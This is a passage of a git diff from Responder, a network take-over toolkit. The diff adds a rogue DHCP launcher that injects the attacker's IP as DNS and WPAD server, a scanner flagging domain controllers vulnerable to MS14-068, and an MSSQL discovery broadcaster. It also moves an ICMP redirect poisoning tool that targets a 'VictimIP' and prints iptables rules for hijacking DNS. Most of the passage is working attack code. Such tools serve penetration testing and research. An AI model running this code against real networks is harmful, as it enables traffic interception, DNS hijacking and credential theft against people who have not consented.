||||||
|
if __name__ == "__main__":
|
||||||
|
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
|
||||||
|
s.bind((Interface, 0x0800))
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
data = s.recvfrom(65535)
|
||||||
|
if data[0][23:24] == "\x11": # is udp?
|
||||||
|
SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
|
||||||
|
|
||||||
|
if SrcPort == 67 or DstPort == 67:
|
||||||
|
ret = ParseDHCPCode(data[0][42:])
|
||||||
|
if ret:
|
||||||
|
print text("[DHCP] %s" % ret)
|
||||||
|
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
sys.exit("\r%s Exiting..." % color('[*]', 2, 1))
|
||||||
|
|
||||||
63
tools/DHCP_Auto.sh
Normal file
63
tools/DHCP_Auto.sh
Normal file
@@ -0,0 +1,63 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
# This file is part of Responder. laurent.gaffie@gmail.com
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
|
||||||
|
# This script will try to auto-detect network parameters
|
||||||
|
# to run the rogue DHCP server, to inject only your IP
|
||||||
|
# address as the primary DNS server and WPAD server and
|
||||||
|
# leave everything else normal.
|
||||||
|
|
||||||
|
if [ -z $1 ]; then
|
||||||
|
echo "usage: $0 <interface>"
|
||||||
|
exit
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ $EUID -ne 0 ]; then
|
||||||
|
echo "Must be run as root."
|
||||||
|
exit
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ ! -d "/sys/class/net/$1" ]; then
|
||||||
|
echo "Interface does not exist."
|
||||||
|
exit
|
||||||
|
fi
|
||||||
|
|
||||||
|
INTF=$1
|
||||||
|
PATH="$PATH:/sbin"
|
||||||
|
IPADDR=`ifconfig $INTF | sed -n 's/inet addr/inet/; s/inet[ :]//p' | awk '{print $1}'`
|
||||||
|
NETMASK=`ifconfig $INTF | sed -n 's/.*[Mm]ask[: ]//p' | awk '{print $1}'`
|
||||||
|
DOMAIN=`grep -E "^domain |^search " /etc/resolv.conf | sort | head -1 | awk '{print $2}'`
|
||||||
|
DNS1=$IPADDR
|
||||||
|
DNS2=`grep ^nameserver /etc/resolv.conf | head -1 | awk '{print $2}'`
|
||||||
|
ROUTER=`route -n | grep ^0.0.0.0 | awk '{print $2}'`
|
||||||
|
WPADSTR="http://$IPADDR/wpad.dat"
|
||||||
|
if [ -z "$DOMAIN" ]; then
|
||||||
|
DOMAIN=" "
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo "Running with parameters:"
|
||||||
|
echo "INTERFACE: $INTF"
|
||||||
|
echo "IP ADDR: $IPADDR"
|
||||||
|
echo "NETMAST: $NETMASK"
|
||||||
|
echo "ROUTER IP: $ROUTER"
|
||||||
|
echo "DNS1 IP: $DNS1"
|
||||||
|
echo "DNS2 IP: $DNS2"
|
||||||
|
echo "WPAD: $WPADSTR"
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
|
||||||
|
echo python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\"
|
||||||
|
python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\"
|
||||||
68
tools/FindSMB2UPTime.py
Executable file
68
tools/FindSMB2UPTime.py
Executable file
@@ -0,0 +1,68 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
import sys
|
||||||
|
import os
|
||||||
|
import datetime
|
||||||
|
import struct
|
||||||
|
import socket
|
||||||
|
|
||||||
|
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..')))
|
||||||
|
from packets import SMB2Header, SMB2Nego, SMB2NegoData
|
||||||
|
|
||||||
|
def GetBootTime(data):
|
||||||
|
Filetime = int(struct.unpack('<q',data)[0])
|
||||||
|
t = divmod(Filetime - 116444736000000000, 10000000)
|
||||||
|
time = datetime.datetime.fromtimestamp(t[0])
|
||||||
|
return time, time.strftime('%Y-%m-%d %H:%M:%S')
|
||||||
|
|
||||||
|
|
||||||
|
def IsDCVuln(t):
|
||||||
|
Date = datetime.datetime(2014, 11, 17, 0, 30)
|
||||||
|
if t[0] < Date:
|
||||||
|
print "DC is up since:", t[1]
|
||||||
|
print "This DC is vulnerable to MS14-068"
|
||||||
|
print "DC is up since:", t[1]
|
||||||
|
|
||||||
|
|
||||||
|
def run(host):
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
s.connect(host)
|
||||||
|
s.settimeout(5)
|
||||||
|
|
||||||
|
Header = SMB2Header(Cmd="\x72",Flag1="\x18",Flag2="\x53\xc8")
|
||||||
|
Nego = SMB2Nego(Data = SMB2NegoData())
|
||||||
|
Nego.calculate()
|
||||||
|
|
||||||
|
Packet = str(Header)+str(Nego)
|
||||||
|
Buffer = struct.pack(">i", len(Packet)) + Packet
|
||||||
|
s.send(Buffer)
|
||||||
|
|
||||||
|
try:
|
||||||
|
data = s.recv(1024)
|
||||||
|
if data[4:5] == "\xff":
|
||||||
|
print "This host doesn't support SMBv2"
|
||||||
|
if data[4:5] == "\xfe":
|
||||||
|
IsDCVuln(GetBootTime(data[116:124]))
|
||||||
|
except Exception:
|
||||||
|
s.close()
|
||||||
|
raise
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
if len(sys.argv)<=1:
|
||||||
|
sys.exit('Usage: python '+sys.argv[0]+' DC-IP-address')
|
||||||
|
host = sys.argv[1],445
|
||||||
|
run(host)
|
||||||
40
tools/FindSQLSrv.py
Executable file
40
tools/FindSQLSrv.py
Executable file
@@ -0,0 +1,40 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
from socket import *
|
||||||
|
|
||||||
|
print 'MSSQL Server Finder 0.1'
|
||||||
|
|
||||||
|
s = socket(AF_INET,SOCK_DGRAM)
|
||||||
|
s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
|
||||||
|
s.settimeout(2)
|
||||||
|
s.sendto('\x02',('255.255.255.255',1434))
|
||||||
|
|
||||||
|
try:
|
||||||
|
while 1:
|
||||||
|
data, address = s.recvfrom(8092)
|
||||||
|
if not data:
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
print "==============================================================="
|
||||||
|
print "Host details:",address[0]
|
||||||
|
print data[2:]
|
||||||
|
print "==============================================================="
|
||||||
|
print ""
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
66
Icmp-Redirect.py → tools/Icmp-Redirect.py
Normal file → Executable file
66
Icmp-Redirect.py → tools/Icmp-Redirect.py
Normal file → Executable file
@@ -1,8 +1,7 @@
|
|||||||
#! /usr/bin/env python
|
#!/usr/bin/env python
|
||||||
# NBT-NS/LLMNR Responder
|
# This file is part of Responder, a network take-over set of tools
|
||||||
# Created by Laurent Gaffie
|
# created and maintained by Laurent Gaffie.
|
||||||
# Copyright (C) 2014 Trustwave Holdings, Inc.
|
# email: laurent.gaffie@gmail.com
|
||||||
#
|
|
||||||
# This program is free software: you can redistribute it and/or modify
|
# This program is free software: you can redistribute it and/or modify
|
||||||
# it under the terms of the GNU General Public License as published by
|
# it under the terms of the GNU General Public License as published by
|
||||||
# the Free Software Foundation, either version 3 of the License, or
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
@@ -15,54 +14,48 @@
|
|||||||
#
|
#
|
||||||
# You should have received a copy of the GNU General Public License
|
# You should have received a copy of the GNU General Public License
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
import sys,socket,struct,optparse,random,pipes
|
import socket
|
||||||
|
import struct
|
||||||
|
import optparse
|
||||||
|
import pipes
|
||||||
|
import sys
|
||||||
from socket import *
|
from socket import *
|
||||||
|
sys.path.append('../')
|
||||||
from odict import OrderedDict
|
from odict import OrderedDict
|
||||||
from random import randrange
|
from random import randrange
|
||||||
from time import sleep
|
from time import sleep
|
||||||
from subprocess import call
|
from subprocess import call
|
||||||
from pipes import quote
|
from packets import Packet
|
||||||
|
|
||||||
parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1',
|
parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1',
|
||||||
prog=sys.argv[0],
|
prog=sys.argv[0],
|
||||||
)
|
)
|
||||||
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
|
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
|
||||||
|
|
||||||
parser.add_option('-g', '--gateway',action="store", help="The ip address of the original gateway (issue the command 'route -n' to know where is the gateway", metavar="10.20.30.254",dest="OriginalGwAddr")
|
parser.add_option('-g', '--gateway',action="store", help="The ip address of the original gateway (issue the command 'route -n' to know where is the gateway", metavar="10.20.30.254",dest="OriginalGwAddr")
|
||||||
|
|
||||||
parser.add_option('-t', '--target',action="store", help="The ip address of the target", metavar="10.20.30.48",dest="VictimIP")
|
parser.add_option('-t', '--target',action="store", help="The ip address of the target", metavar="10.20.30.48",dest="VictimIP")
|
||||||
|
|
||||||
parser.add_option('-r', '--route',action="store", help="The ip address of the destination target, example: DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost")
|
parser.add_option('-r', '--route',action="store", help="The ip address of the destination target, example: DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost")
|
||||||
|
|
||||||
parser.add_option('-s', '--secondaryroute',action="store", help="The ip address of the destination target, example: Secondary DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost2")
|
parser.add_option('-s', '--secondaryroute',action="store", help="The ip address of the destination target, example: Secondary DNS server. Must be on another subnet.", metavar="10.20.40.1",dest="ToThisHost2")
|
||||||
|
|
||||||
parser.add_option('-I', '--interface',action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
|
parser.add_option('-I', '--interface',action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
|
||||||
|
|
||||||
parser.add_option('-a', '--alternate',action="store", help="The alternate gateway, set this option if you wish to redirect the victim traffic to another host than yours", metavar="10.20.30.40",dest="AlternateGwAddr")
|
parser.add_option('-a', '--alternate',action="store", help="The alternate gateway, set this option if you wish to redirect the victim traffic to another host than yours", metavar="10.20.30.40",dest="AlternateGwAddr")
|
||||||
|
|
||||||
options, args = parser.parse_args()
|
options, args = parser.parse_args()
|
||||||
|
|
||||||
if options.OURIP is None:
|
if options.OURIP is None:
|
||||||
print "-i mandatory option is missing.\n"
|
print "-i mandatory option is missing.\n"
|
||||||
parser.print_help()
|
parser.print_help()
|
||||||
exit(-1)
|
exit(-1)
|
||||||
|
elif options.OriginalGwAddr is None:
|
||||||
if options.OriginalGwAddr is None:
|
|
||||||
print "-g mandatory option is missing, please provide the original gateway address.\n"
|
print "-g mandatory option is missing, please provide the original gateway address.\n"
|
||||||
parser.print_help()
|
parser.print_help()
|
||||||
exit(-1)
|
exit(-1)
|
||||||
|
elif options.VictimIP is None:
|
||||||
if options.VictimIP is None:
|
|
||||||
print "-t mandatory option is missing, please provide a target.\n"
|
print "-t mandatory option is missing, please provide a target.\n"
|
||||||
parser.print_help()
|
parser.print_help()
|
||||||
exit(-1)
|
exit(-1)
|
||||||
|
elif options.Interface is None:
|
||||||
if options.Interface is None:
|
|
||||||
print "-I mandatory option is missing, please provide your network interface.\n"
|
print "-I mandatory option is missing, please provide your network interface.\n"
|
||||||
parser.print_help()
|
parser.print_help()
|
||||||
exit(-1)
|
exit(-1)
|
||||||
|
elif options.ToThisHost is None:
|
||||||
if options.ToThisHost is None:
|
|
||||||
print "-r mandatory option is missing, please provide a destination target.\n"
|
print "-r mandatory option is missing, please provide a destination target.\n"
|
||||||
parser.print_help()
|
parser.print_help()
|
||||||
exit(-1)
|
exit(-1)
|
||||||
@@ -80,31 +73,16 @@ ToThisHost2 = options.ToThisHost2
|
|||||||
Interface = options.Interface
|
Interface = options.Interface
|
||||||
|
|
||||||
def Show_Help(ExtraHelpData):
|
def Show_Help(ExtraHelpData):
|
||||||
help = "\nICMP Redirect Utility 0.1.\nCreated by Laurent Gaffie, please send bugs/comments to lgaffie@trustwave.com\n\nThis utility combined with Responder is useful when you're sitting on a Windows based network.\nMost Linux distributions discard by default ICMP Redirects.\n"
|
print("\nICMP Redirect Utility 0.1.\nCreated by Laurent Gaffie, please send bugs/comments to laurent.gaffie@gmail.com\n\nThis utility combined with Responder is useful when you're sitting on a Windows based network.\nMost Linux distributions discard by default ICMP Redirects.\n")
|
||||||
help+= ExtraHelpData
|
print(ExtraHelpData)
|
||||||
print help
|
|
||||||
|
|
||||||
MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)
|
MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)
|
||||||
|
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
def GenCheckSum(data):
|
def GenCheckSum(data):
|
||||||
s = 0
|
s = 0
|
||||||
for i in range(0, len(data), 2):
|
for i in range(0, len(data), 2):
|
||||||
q = ord(data[i]) + (ord(data[i+1]) << 8)
|
q = ord(data[i]) + (ord(data[i+1]) << 8)
|
||||||
f = s+q
|
f = s + q
|
||||||
s = (f & 0xffff) + (f >> 16)
|
s = (f & 0xffff) + (f >> 16)
|
||||||
return struct.pack("<H",~s & 0xffff)
|
return struct.pack("<H",~s & 0xffff)
|
||||||
|
|
||||||
@@ -116,7 +94,6 @@ class EthARP(Packet):
|
|||||||
("DstMac", "\xff\xff\xff\xff\xff\xff"),
|
("DstMac", "\xff\xff\xff\xff\xff\xff"),
|
||||||
("SrcMac", ""),
|
("SrcMac", ""),
|
||||||
("Type", "\x08\x06" ), #ARP
|
("Type", "\x08\x06" ), #ARP
|
||||||
|
|
||||||
])
|
])
|
||||||
|
|
||||||
class ARPWhoHas(Packet):
|
class ARPWhoHas(Packet):
|
||||||
@@ -130,7 +107,6 @@ class ARPWhoHas(Packet):
|
|||||||
("SenderIP", "\x00\xff\x53\x4d"),
|
("SenderIP", "\x00\xff\x53\x4d"),
|
||||||
("DstMac", "\x00\x00\x00\x00\x00\x00"),
|
("DstMac", "\x00\x00\x00\x00\x00\x00"),
|
||||||
("DstIP", "\x00\x00\x00\x00"),
|
("DstIP", "\x00\x00\x00\x00"),
|
||||||
|
|
||||||
])
|
])
|
||||||
|
|
||||||
def calculate(self):
|
def calculate(self):
|
||||||
@@ -145,7 +121,6 @@ class Eth2(Packet):
|
|||||||
("DstMac", ""),
|
("DstMac", ""),
|
||||||
("SrcMac", ""),
|
("SrcMac", ""),
|
||||||
("Type", "\x08\x00" ), #IP
|
("Type", "\x08\x00" ), #IP
|
||||||
|
|
||||||
])
|
])
|
||||||
|
|
||||||
class IPPacket(Packet):
|
class IPPacket(Packet):
|
||||||
@@ -162,7 +137,6 @@ class IPPacket(Packet):
|
|||||||
("SrcIP", ""),
|
("SrcIP", ""),
|
||||||
("DestIP", ""),
|
("DestIP", ""),
|
||||||
("Data", ""),
|
("Data", ""),
|
||||||
|
|
||||||
])
|
])
|
||||||
|
|
||||||
def calculate(self):
|
def calculate(self):
|
||||||
@@ -183,13 +157,10 @@ class ICMPRedir(Packet):
|
|||||||
("CheckSum", "\x00\x00"),
|
("CheckSum", "\x00\x00"),
|
||||||
("GwAddr", ""),
|
("GwAddr", ""),
|
||||||
("Data", ""),
|
("Data", ""),
|
||||||
|
|
||||||
])
|
])
|
||||||
|
|
||||||
def calculate(self):
|
def calculate(self):
|
||||||
#Set the values
|
|
||||||
self.fields["GwAddr"] = inet_aton(OURIP)
|
self.fields["GwAddr"] = inet_aton(OURIP)
|
||||||
# Then CheckSum this packet
|
|
||||||
CheckSumCalc =str(self.fields["Type"])+str(self.fields["OpCode"])+str(self.fields["CheckSum"])+str(self.fields["GwAddr"])+str(self.fields["Data"])
|
CheckSumCalc =str(self.fields["Type"])+str(self.fields["OpCode"])+str(self.fields["CheckSum"])+str(self.fields["GwAddr"])+str(self.fields["Data"])
|
||||||
self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
|
self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
|
||||||
|
|
||||||
@@ -264,4 +235,3 @@ def RunThisInLoop(host, host2, ip):
|
|||||||
sleep(480)
|
sleep(480)
|
||||||
|
|
||||||
FindWhatToDo(ToThisHost2)
|
FindWhatToDo(ToThisHost2)
|
||||||
|
|
||||||
@@ -1,7 +1,7 @@
|
|||||||
# NBT-NS/LLMNR Responder
|
#!/usr/bin/env python
|
||||||
# Created by Laurent Gaffie
|
# This file is part of Responder, a network take-over set of tools
|
||||||
# Copyright (C) 2014 Trustwave Holdings, Inc.
|
# created and maintained by Laurent Gaffie.
|
||||||
#
|
# email: laurent.gaffie@gmail.com
|
||||||
# This program is free software: you can redistribute it and/or modify
|
# This program is free software: you can redistribute it and/or modify
|
||||||
# it under the terms of the GNU General Public License as published by
|
# it under the terms of the GNU General Public License as published by
|
||||||
# the Free Software Foundation, either version 3 of the License, or
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
@@ -15,42 +15,24 @@
|
|||||||
# You should have received a copy of the GNU General Public License
|
# You should have received a copy of the GNU General Public License
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
import struct
|
import struct
|
||||||
|
import sys
|
||||||
|
sys.path.append('../')
|
||||||
from odict import OrderedDict
|
from odict import OrderedDict
|
||||||
|
from packets import Packet
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
##################################################################################
|
|
||||||
#SMB Client Stuff
|
|
||||||
##################################################################################
|
|
||||||
|
|
||||||
def longueur(payload):
|
|
||||||
length = struct.pack(">i", len(''.join(payload)))
|
|
||||||
return length
|
|
||||||
|
|
||||||
class SMBHeader(Packet):
|
class SMBHeader(Packet):
|
||||||
fields = OrderedDict([
|
fields = OrderedDict([
|
||||||
("proto", "\xff\x53\x4d\x42"),
|
("proto", "\xff\x53\x4d\x42"),
|
||||||
("cmd", "\x72"),
|
("cmd", "\x72"),
|
||||||
("error-code", "\x00\x00\x00\x00" ),
|
("errorcode", "\x00\x00\x00\x00"),
|
||||||
("flag1", "\x00"),
|
("flag1", "\x00"),
|
||||||
("flag2", "\x00\x00"),
|
("flag2", "\x00\x00"),
|
||||||
("pidhigh", "\x00\x00"),
|
("pidhigh", "\x00\x00"),
|
||||||
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
||||||
("reserved", "\x00\x00"),
|
("reserved", "\x00\x00"),
|
||||||
("tid", "\x00\x00"),
|
("tid", "\x00\x00"),
|
||||||
("pid", "\x00\x4e"),
|
("pid", "\x00\x00"),
|
||||||
("uid", "\x00\x08"),
|
("uid", "\x00\x00"),
|
||||||
("mid", "\x00\x00"),
|
("mid", "\x00\x00"),
|
||||||
])
|
])
|
||||||
|
|
||||||
@@ -285,7 +267,6 @@ class SMBDCESVCCTLOpenManagerW(Packet):
|
|||||||
## Convert to UTF-16LE
|
## Convert to UTF-16LE
|
||||||
self.fields["MachineName"] = self.fields["MachineName"].encode('utf-16le')
|
self.fields["MachineName"] = self.fields["MachineName"].encode('utf-16le')
|
||||||
|
|
||||||
|
|
||||||
class SMBDCESVCCTLCreateService(Packet):
|
class SMBDCESVCCTLCreateService(Packet):
|
||||||
fields = OrderedDict([
|
fields = OrderedDict([
|
||||||
("ContextHandle", ""),
|
("ContextHandle", ""),
|
||||||
@@ -332,8 +313,6 @@ class SMBDCESVCCTLCreateService(Packet):
|
|||||||
self.fields["BinCMD"] = self.fields["BinCMD"].encode('utf-16le')
|
self.fields["BinCMD"] = self.fields["BinCMD"].encode('utf-16le')
|
||||||
self.fields["BintoEnd"] = self.fields["BintoEnd"].encode('utf-16le')
|
self.fields["BintoEnd"] = self.fields["BintoEnd"].encode('utf-16le')
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
class SMBDCESVCCTLOpenService(Packet):
|
class SMBDCESVCCTLOpenService(Packet):
|
||||||
fields = OrderedDict([
|
fields = OrderedDict([
|
||||||
("ContextHandle", ""),
|
("ContextHandle", ""),
|
||||||
@@ -362,119 +341,3 @@ def ParseAnswerKey(data,host):
|
|||||||
key = data[73:81]
|
key = data[73:81]
|
||||||
print "Key retrieved is:%s from host:%s"%(key.encode("hex"),host)
|
print "Key retrieved is:%s from host:%s"%(key.encode("hex"),host)
|
||||||
return key
|
return key
|
||||||
|
|
||||||
##################################################################################
|
|
||||||
#SMB Server Stuff
|
|
||||||
##################################################################################
|
|
||||||
|
|
||||||
#Calculate total SMB packet len.
|
|
||||||
def longueur(payload):
|
|
||||||
length = struct.pack(">i", len(''.join(payload)))
|
|
||||||
return length
|
|
||||||
|
|
||||||
#Set MID SMB Header field.
|
|
||||||
def midcalc(data):
|
|
||||||
pack=data[34:36]
|
|
||||||
return pack
|
|
||||||
|
|
||||||
#Set UID SMB Header field.
|
|
||||||
def uidcalc(data):
|
|
||||||
pack=data[32:34]
|
|
||||||
return pack
|
|
||||||
|
|
||||||
#Set PID SMB Header field.
|
|
||||||
def pidcalc(data):
|
|
||||||
pack=data[30:32]
|
|
||||||
return pack
|
|
||||||
|
|
||||||
#Set TID SMB Header field.
|
|
||||||
def tidcalc(data):
|
|
||||||
pack=data[28:30]
|
|
||||||
return pack
|
|
||||||
|
|
||||||
#SMB Header answer packet.
|
|
||||||
class SMBHeader(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("proto", "\xff\x53\x4d\x42"),
|
|
||||||
("cmd", "\x72"),
|
|
||||||
("errorcode", "\x00\x00\x00\x00" ),
|
|
||||||
("flag1", "\x80"),
|
|
||||||
("flag2", "\x00\x00"),
|
|
||||||
("pidhigh", "\x00\x00"),
|
|
||||||
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
||||||
("reserved", "\x00\x00"),
|
|
||||||
("tid", "\x00\x00"),
|
|
||||||
("pid", "\xff\xfe"),
|
|
||||||
("uid", "\x00\x00"),
|
|
||||||
("mid", "\x00\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
#SMB Negotiate Answer packet.
|
|
||||||
class SMBNegoAns(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Wordcount", "\x11"),
|
|
||||||
("Dialect", ""),
|
|
||||||
("Securitymode", "\x03"),
|
|
||||||
("MaxMpx", "\x32\x00"),
|
|
||||||
("MaxVc", "\x01\x00"),
|
|
||||||
("Maxbuffsize", "\x04\x11\x00\x00"),
|
|
||||||
("Maxrawbuff", "\x00\x00\x01\x00"),
|
|
||||||
("Sessionkey", "\x00\x00\x00\x00"),
|
|
||||||
("Capabilities", "\xfd\x43\x00\x00"),
|
|
||||||
("Systemtime", "\xc2\x74\xf2\x53\x70\x02\xcf\x01\x2c\x01"),
|
|
||||||
("Keylength", "\x08"),
|
|
||||||
("Bcc", "\x10\x00"),
|
|
||||||
("Key", "\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d"),
|
|
||||||
("Domain", ""),
|
|
||||||
|
|
||||||
])
|
|
||||||
|
|
||||||
def calculate(self):
|
|
||||||
|
|
||||||
##Then calculate.
|
|
||||||
CompleteBCCLen = str(self.fields["Key"])+str(self.fields["Domain"])
|
|
||||||
self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen))
|
|
||||||
self.fields["Keylength"] = struct.pack("<h",len(self.fields["Key"]))[0]
|
|
||||||
|
|
||||||
# SMB Session/Tree Answer.
|
|
||||||
class SMBSessTreeAns(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Wordcount", "\x03"),
|
|
||||||
("Command", "\x75"),
|
|
||||||
("Reserved", "\x00"),
|
|
||||||
("AndXoffset", "\x4e\x00"),
|
|
||||||
("Action", "\x01\x00"),
|
|
||||||
("Bcc", "\x25\x00"),
|
|
||||||
("NativeOs", "Windows 5.1"),
|
|
||||||
("NativeOsNull", "\x00"),
|
|
||||||
("NativeLan", "Windows 2000 LAN Manager"),
|
|
||||||
("NativeLanNull", "\x00"),
|
|
||||||
("WordcountTree", "\x03"),
|
|
||||||
("AndXCommand", "\xff"),
|
|
||||||
("Reserved1", "\x00"),
|
|
||||||
("AndxOffset", "\x00\x00"),
|
|
||||||
("OptionalSupport", "\x01\x00"),
|
|
||||||
("Bcc2", "\x08\x00"),
|
|
||||||
("Service", "A:"),
|
|
||||||
("ServiceNull", "\x00"),
|
|
||||||
("FileSystem", "NTFS"),
|
|
||||||
("FileSystemNull", "\x00"),
|
|
||||||
|
|
||||||
])
|
|
||||||
|
|
||||||
def calculate(self):
|
|
||||||
##AndxOffset
|
|
||||||
CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["Command"])+str(self.fields["Reserved"])+str(self.fields["AndXoffset"])+str(self.fields["Action"])+str(self.fields["Bcc"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
|
|
||||||
|
|
||||||
self.fields["AndXoffset"] = struct.pack("<i", len(CalculateCompletePacket)+32)[:2]#SMB Header is *always* 32.
|
|
||||||
##BCC 1 and 2
|
|
||||||
CompleteBCCLen = str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
|
|
||||||
self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen))
|
|
||||||
CompleteBCC2Len = str(self.fields["Service"])+str(self.fields["ServiceNull"])+str(self.fields["FileSystem"])+str(self.fields["FileSystemNull"])
|
|
||||||
self.fields["Bcc2"] = struct.pack("<h",len(CompleteBCC2Len))
|
|
||||||
|
|
||||||
class SMBSessEmpty(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
